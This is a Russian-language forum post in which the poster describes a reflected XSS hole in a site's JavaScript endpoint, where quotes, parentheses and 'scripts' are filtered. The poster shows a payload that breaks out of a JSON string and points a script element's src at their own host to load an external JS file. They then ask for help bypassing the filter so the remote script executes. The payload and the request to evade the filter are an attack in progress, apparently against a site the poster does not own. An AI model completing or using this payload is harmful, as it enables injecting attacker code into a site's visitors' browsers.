Добрый день.
Имеется сайт с XSS: http://site.com/?name=
XSS_TEXT
Html код этой страницы такой:
В свою очередь http://site.com/javascript-file.js?param=
XSS_TEXT отдает вот что:
Код:
var sss = {
"param1" : 1,
"param2" : {
"param3" : 3,
"param4" : "XSS_TEXT"
}
};
Проблема в том что режется
' ,
( ,
) ,
scripts .
Поэтому все известные мне методы сразу отпали. Максимум чего мне удалось дописать это вот что:
http://site.com/javascript-file.js?param=
"}};document.head.childNodes[1].src="http://mysite.com/global.js";var b={"1":{"1":"
Код:
var sss = {
"param1" : 1,
"param2" : {
"param3" : 3,
"param4" : ""}};
document.head.childNodes[1].src="http://mysite.com/global.js";
var b={"1":{"1":""
}
};
Fосле выполнения моего кода http://site.com/?name=
"}};document.head.childNodes[1].src="http://mysite.com/global.js";var b={"1":{"1":" получается таким:
src меняется на мой, но прогрузки файла не происходит, соответственно и JS код не выполняется. Я не спец в JS, много не знаю. Поэтому прошу помочь обойти эту защиту, цель подключить и выполнить мой js файл(http://mysite.com/global.js)
Спасибо